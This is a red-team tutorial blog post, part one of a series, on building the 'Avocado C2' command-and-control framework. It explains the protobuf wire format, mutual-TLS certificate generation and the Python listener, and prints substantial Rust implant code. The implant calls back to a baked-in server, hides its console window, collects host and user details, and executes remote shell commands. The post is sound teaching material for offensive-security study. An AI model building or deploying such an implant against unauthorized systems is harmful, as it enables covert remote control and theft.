
Introduction
Command and Control (C2) frameworks are the backbone of red team operations. They allow operators to manage compromised machines, execute commands remotely, exfiltrate data, and maintain persistence. While mature C2 frameworks like Cobalt Strike, Sliver, and Mythic exist, building one from scratch is one of the best ways to deeply understand offensive security tooling, network programming, and the cat-and-mouse game between attackers and defenders.
In this two-part series, we walk through the design and implementation of Avocado C2, an open-source C2 framework with a Rust-based implant, a Python server, and both CLI and GUI operators. This first post covers the foundational architecture, including how the components communicate, the way we secured the channel with mutual TLS, how Protocol Buffers define our wire format, and how the Rust implant works from the inside out.
High-Level Architecture
Avocado consists of three core components.
| Component | Language | Role |
|---|---|---|
| Server | Python | Accepts implant connections (mTLS), accepts operator connections, and routes commands between operators and implants |
| Implant | Rust | Runs on the target machine, connects back to the server over mTLS, executes commands, and reports system info |
| Operator | Python (CLI + PyQt6 GUI) | The red teamer's interface for listing sessions, sending commands, and generating new implants |
The data flow looks like this:
Operator <--TCP--> Server <--mTLS--> Implant
(CLI/GUI) (Python) (Rust)
:31338 :31337
The server acts as a broker. Operators connect over a plain TCP socket on port 31338 and issue commands. The server relays those commands to the appropriate implant over a mutual TLS connection on port 31337, then sends the output back to the operator.
We chose two separate protocols for specific reasons. The operator is a trusted party running on the red teamer's own machine, so we do not need the overhead of mTLS there. However, the implant-to-server channel traverses hostile networks and requires the full cryptographic treatment.
Defining the Wire Format with Protocol Buffers
Before writing any networking code, we need to agree on how data is structured on the wire. We use Protocol Buffers (protobuf) for this task because they are compact, fast to serialize and deserialize, and generate code for both Rust and Python.
The Implant Protocol
The implant protocol (implantpb.proto) defines all messages exchanged between the implant and the server.
syntax = "proto3";
package implantpb;
message Message {
enum MessageType {
Error = 0;
Registration = 1;
RegistrationConfirmation = 2;
OsCmd = 3;
OsCmdOutput = 4;
FileXfer = 5;
FilePacket = 6;
}
MessageType message_type = 1;
bytes data = 2;
}
There is an important design decision here. Python's protobuf implementation will happily deserialize any byte stream into any protobuf message type without errors, but it silently ignores fields it does not recognize. This means if you send a Registration message and try to decode it as an OsCmd, Python will not complain and will instead provide empty fields.
To work around this, every message is wrapped in a Message envelope that carries a MessageType discriminator. The receiver checks the type first and then deserializes the inner data bytes into the correct protobuf type. This is essentially a simplified version of a tagged union for protobuf.
The following represent the key message types.
// System information sent when an implant first connects
message Registration {
string addr = 1;
string os = 2;
uint32 pid = 3;
message User {
uint32 id = 1;
string name = 2;
}
User user = 4;
repeated User groups = 5;
}
// Server confirms the registration and assigns an ID
message RegistrationConfirmation {
string id = 1;
}
// A command to execute on the target
message OsCmd {
string cmd = 1;
}
// The result of an executed command
message OsCmdOutput {
oneof status {
int32 code = 1;
}
bytes stdout = 2;
bytes stderr = 3;
}
The Operator Protocol
The operator protocol (operatorpb.proto) is separate. Operators do not talk directly to implants. Instead, they talk to the server, which translates between the two protocols.
syntax = "proto3";
package operatorpb;
message Message {
enum MessageType {
SessionCmd = 0;
SessionCmdOutput = 1;
SessionInfo = 2;
}
MessageType message_type = 1;
bytes data = 2;
}
message SessionCmd {
string cmd = 1;
string id = 2;
}
message SessionCmdOutput {
string cmdOutput = 1;
string id = 2;
}
message SessionInfo {
string id = 1;
string addr = 2;
string os = 3;
uint32 pid = 4;
message User {
uint32 id = 1;
string name = 2;
}
User user = 5;
repeated User groups = 6;
}
The SessionCmd includes an id field, which is the session UUID assigned when the implant registered. This allows the operator to target a specific implant when multiple are connected.
Compiling Protobufs for Rust
On the Rust side, we use prost-build to compile .proto files at build time. The build.rs script is quite small.
fn main() {
prost_build::compile_protos(&["src/implantpb.proto"], &["src/"]).unwrap();
}
This generates Rust structs and serialization code automatically. In Cargo.toml, we include the build dependency.
[build-dependencies]
prost-build = "0.11.8"
[dependencies]
prost = "0.11.8"
Mutual TLS: Securing the Implant Channel
The implant-to-server connection uses mutual TLS (mTLS). In regular TLS, only the server proves its identity. In mTLS, both sides present certificates. This ensures that the implant verifies it is talking to the real C2 server rather than a honeypot, and the server verifies the implant has a certificate signed by our own CA.
Generating Certificates in Pure Python
Early versions of Avocado relied on mkcert, an external tool. This caused issues with different OS environments, missing binaries, and Docker path headaches. We replaced it with a pure Python implementation using the cryptography library.
The cert_generator class handles the entire PKI.
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes, serialization
import datetime, os
class cert_generator(object):
def __init__(self, name: str, client: bool):
self.name = name
self.key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
)
self.cert_dir = os.path.join(AVOCADO_ROOT, "certs", self.name)
if client == False:
# Server mode: generating a new CA
self.CA, self.CA_Key, self.CA_Path = self.generate_CA()
else:
# Client mode: loading the existing CA to sign the implant cert
self.CA, self.CA_Key, self.CA_Path = self.load_CA('root')
When the server starts, it creates a new Root CA and generates a server certificate signed by that CA. When an implant is generated, the operator creates a new client certificate signed by the same Root CA and embeds it into the implant binary.
Here is the CA generation.
def generate_CA(self):
one_day = datetime.timedelta(1, 0, 0)
private_key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
)
builder = x509.CertificateBuilder()
builder = builder.subject_name(x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, u'root'),
]))
builder = builder.issuer_name(x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, u'root'),
]))
builder = builder.not_valid_before(datetime.datetime.today() - one_day)
builder = builder.not_valid_after(datetime.datetime.today() + (one_day * 30))
builder = builder.serial_number(x509.random_serial_number())
builder = builder.public_key(private_key.public_key())
builder = builder.add_extension(
x509.BasicConstraints(ca=True, path_length=None), critical=True,
)
certificate = builder.sign(
private_key=private_key, algorithm=hashes.SHA256(),
)
# Save to disk...
return certificate, private_key, rootCA_cert
The client and server certificate generation follows a similar pattern, where each is signed by the CA. The critical detail is that the certificate is signed by self.CA_Key, which is the CA's private key, rather than the certificate's own key. This is what makes the chain of trust work. Since both the server and implant certificates are signed by the same root CA, each side can verify the other.
Server-Side mTLS in Python
The server's Listener class sets up mTLS using Python's ssl module.
class Listener:
def __init__(self, requestq: Queue, endpoint: Tuple[str, int]):
self.host, self.port = endpoint
self.sessions = Sessions()
# Generate CA + server certs on startup
self.Server_Certificate_Generator = cert_generator('server', client=False)
self.server_cert, self.server_key = self.Server_Certificate_Generator.build_x509_cert()
ctx = self._mtls_cfg()
self.ssock = self._mkssock(ctx)
t = threading.Thread(target=self._accept, args=(requestq,), daemon=True)
t.start()
def _mtls_cfg(self) -> ssl.SSLContext:
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ctx.verify_mode = ssl.CERT_REQUIRED # This enables mutual authentication
ctx.load_cert_chain(certfile=self.server_cert, keyfile=self.server_key)
ctx.load_verify_locations(cafile=self.Server_Certificate_Generator.CA_Path)
return ctx
The key line is ctx.verify_mode = ssl.CERT_REQUIRED. Without it, you would have regular TLS where only the server authenticates. With it, the server demands that the client present a valid certificate signed by the same CA.
Client-Side mTLS in Rust
On the implant side, we use rustls for TLS. The configuration loads certificates that were embedded at compile time.
pub fn client_config(
root_ca: &str,
client_pem: &str,
client_key: &str,
) -> Result<rustls::ClientConfig> {
let root_store = load_root_store(root_ca)?;
let client_pem = load_pem(client_pem)?;
let client_key = load_key(client_key)?;
let mut config = rustls::ClientConfig::builder()
.with_safe_defaults()
.with_root_certificates(root_store) // Verify the server's cert
.with_single_cert(client_pem, client_key)?; // Present our own cert
config.alpn_protocols = vec!["PostHandshakeAuth".as_bytes().to_vec()];
Ok(config)
}
The certificates are not loaded from disk at runtime. Instead, they are compiled into the binary using rust-embed. This is important for OPSEC, as the implant binary is a single, self-contained executable with no external dependencies or config files. Everything is baked in at compile time.
The Rust Implant: Deep Dive
Why Rust?
There are several reasons to write the implant in Rust rather than Python or C.
- Static binaries: Using musl, we can compile to a fully static binary with zero runtime dependencies. You can drop it on any Linux box and it will run.
- Cross-compilation: We can compile for Linux and Windows from the same build environment.
- Small binaries: With the right profile settings, the implant is quite small.
- Memory safety: Rust prevents buffer overflows, use-after-free, and null pointer dereferences by design, which are common vulnerabilities in C implants.
- No runtime: Unlike Go, there is no garbage collector or large runtime to inflate the binary size.
The Cargo.toml release profile is tuned for minimal binary size.
[profile.release]
strip = true # Strip debug symbols
opt-level = "z" # Optimize for size, not speed
lto = true # Link-time optimization
codegen-units = 1 # Single codegen unit for better optimization
panic = "abort" # Don't include unwinding code
[target.x86_64-unknown-linux-musl]
rustflags = ["-C", "target-feature=+crt-static"]
[target.x86_64-pc-windows-gnu]
rustflags = ["-C", "target-feature=+crt-static"]
The Main Loop
The implant's main() function is remarkably clean considering how much it handles.
#![windows_subsystem = "windows"] // Don't flash a console window on Windows
fn main() {
// Configure mutual TLS with embedded certificates
let config = mtls::client_config(
embed::SERVER_ROOTCA,
embed::IMPLANT_PUBLIC_KEY,
embed::IMPLANT_PRIVATE_KEY,
).unwrap();
// Point to the C2 server (address baked in at compile time)
let addr = embed::SERVER_ENDPOINT.parse().unwrap();
let server = mtls::Server::new(addr, embed::SERVER_NAME).unwrap();
// Create two channels for bidirectional communication
let (read_tx, read_rx) = mpsc::channel();
let (write_tx, write_rx) = mpsc::channel();
// Start the mTLS session in a separate thread
let mut client = mtls::Client::new(config, server).unwrap();
let session_thread = thread::spawn(move || {
client.session(write_rx, read_tx);
});
// Start processing messages from the server
handler::Handler::new(read_rx, write_tx).start();
session_thread.join().unwrap();
}
The architecture uses channels (mpsc::channel) to decouple the TLS network thread from the message handler thread. The TLS thread reads encrypted bytes and decodes them into protobuf Message objects, which it sends to the handler via a channel. The handler processes the message and sends a response back through another channel for transmission.
The Non-Blocking TLS Client
The TLS client uses mio for non-blocking I/O. This is critical because we need to simultaneously read from the server to receive commands and write to the server to send results. A blocking approach would lead to a deadlock.
pub fn session(&mut self, rx: mpsc::Receiver<pb::Message>, tx: mpsc::Sender<pb::Message>) {
let mut events = mio::Events::with_capacity(128);
let mut poll = mio::Poll::new().unwrap();
poll.registry().register(
&mut self.sock, CLIENT,
Interest::READABLE | Interest::WRITABLE,
).unwrap();
loop {
poll.poll(&mut events, None).unwrap();
for event in events.iter() {
if event.is_readable() {
// Read data from the server
self.conn.read_tls(&mut self.sock).unwrap();
let io_state = self.conn.process_new_packets().unwrap();
if io_state.plaintext_bytes_to_read() > 0 {
let buf = self.read().unwrap();
let message = pb::Message::decode(buf.as_slice()).unwrap();
tx.send(message).unwrap();
}
if io_state.peer_has_closed() {
return;
}
}
if event.is_writable() {
self.conn.write_tls(&mut self.sock).unwrap();
if let Ok(message) = rx.recv_timeout(CHANNEL_TIMEOUT) {
self.write(message.encode_to_vec()).unwrap();
}
}
}
}
}
The mio event loop polls the socket for events. When data arrives, it decrypts the TLS layer, decodes the protobuf message, and forwards it through the channel. When the socket is writable, it checks if there is a pending response to send.
The Message Handler
The handler is a state machine with two states, Unregistered and Registered.
enum Status {
Unregistered,
Registered(String),
}
impl Handler {
pub fn start(&mut self) {
// First, send a registration message
self.tx.send(self.register()).unwrap();
while let Ok(message) = self.rx.recv() {
match &self.status {
Status::Unregistered => {
self.handle_confirmation(message);
}
Status::Registered(_id) => {
let message = self.handle_message_authed(message);
self.tx.send(message).unwrap();
}
}
}
}
}
When the implant first connects, it sends a Registration message with system information and waits for a confirmation. Once confirmed, it enters the Registered state and starts processing commands.
Gathering System Information
The tasks::register() function collects information about the target machine.
pub fn register() -> Result<Registration> {
let info = super::info::Info::new();
Ok(Registration {
addr: "".to_string(), // The server determines the IP
os: info.os()?, // e.g., "Ubuntu 22.04.1 LTS"
pid: info.pid()?, // Process ID of the implant
user: Some(info.user()?), // Username and UID
groups: info.groups()?, // Group memberships
})
}
The Info struct uses the sysinfo and whoami crates to gather this data. The IP address is determined by the server from the socket connection rather than being self-reported by the implant, which is more reliable since the implant might be behind NAT.
Command Execution
When the handler receives an OsCmd message, it executes the command using platform-specific code.
#[cfg(target_os = "linux")]
pub fn exec(cmd: &str) -> anyhow::Result<Output> {
let cmd = cmd.trim_matches(char::from(0));
let output = Command::new("/bin/bash").args(["-c", cmd]).output()?;
Ok(output)
}
#[cfg(target_os = "windows")]
pub fn exec(cmd: &str) -> anyhow::Result<Output> {
let cmd = cmd.trim_matches(char::from(0));
let output = Command::new("cmd").args(["/C", cmd]).output()?;
Ok(output)
}
The #[cfg(target_os = "...")] attributes ensure that only the relevant platform's code is included in the final binary. On Linux, commands run through /bin/bash -c, while on Windows, they run through cmd /C. The trim_matches(char::from(0)) call strips any null bytes that might sneak in from protobuf padding.
The result is wrapped back into a protobuf response. Error handling uses Rust's Result type, so if a command fails, we send back an Error protobuf with the details rather than crashing the implant.
Session Management
On the server side, sessions are tracked in a thread-safe dictionary.
class Sessions:
def __init__(self):
self._mutex = threading.Lock()
self._sessions = dict()
def add(self, conn, addr) -> str:
self._mutex.acquire()
id = str(uuid.uuid4())
self._sessions[id] = (conn, addr)
self._mutex.release()
return id
def get(self, id):
self._mutex.acquire()
conn, addr = self._sessions[id]
self._mutex.release()
return (conn, addr)
Each implant gets a UUID assigned at registration. When an operator wants to interact with a specific implant, they reference it by this UUID. The server looks up the corresponding SSL socket and forwards commands to it.
What We've Built So Far
At this point, we have a working foundation.
- A protobuf-based wire protocol with type safety.
- Mutual TLS authentication between the implant and the server.
- A Rust implant that registers, gathers system info, and executes commands.
- Cross-platform support for Linux and Windows using conditional compilation.
- Session management with UUID-based addressing.

In Part 2, we will build the server's command routing, the operator interfaces for both CLI and GUI, the implant generation pipeline, and the Docker-based deployment system that ties everything together.
Avocado C2 is an open-source project by PlatformSecurity. This post is for educational purposes, and you should always obtain proper authorization before using offensive security tools.